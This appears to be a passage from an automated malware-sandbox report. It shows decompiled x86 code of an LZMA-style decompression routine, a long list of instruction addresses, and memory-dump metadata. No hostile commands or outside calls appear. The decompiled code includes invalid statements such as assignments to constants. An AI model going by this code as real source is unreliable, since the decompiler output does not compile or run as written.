							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                            0x00406786
                                                                            0x0040678d
                                                                            0x00406793
                                                                            0x00406799
                                                                            0x00000000
                                                                            0x0040679d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067bf
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d4
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x0040681f
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406824
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683c
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406893
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x00406898
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b5
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fb
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa3
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fd9
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x00000000
                                                                            0x00407195
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407001
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00000000
                                                                            0x004069b2
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406995
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be6
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf3
                                                                            0x00406bf6
                                                                            0x00406bf9
                                                                            0x00406bfc
                                                                            0x00406bff
                                                                            0x00406c01
                                                                            0x00406c08
                                                                            0x00406c09
                                                                            0x00406c0b
                                                                            0x00406c0e
                                                                            0x00406c11
                                                                            0x00406c14
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406c19
                                                                            0x00406bca
                                                                            0x00406bcd
                                                                            0x00406bd0
                                                                            0x00406bda
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c34
                                                                            0x00406c37
                                                                            0x00406c3a
                                                                            0x00406c3d
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406c4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00000000
                                                                            0x00406cfd
                                                                            0x00406ce8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00406d23
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1c
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00000000
                                                                            0x0040704f
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x0040700d
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b1
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070e3
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x004071ab
                                                                            0x004071b1
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
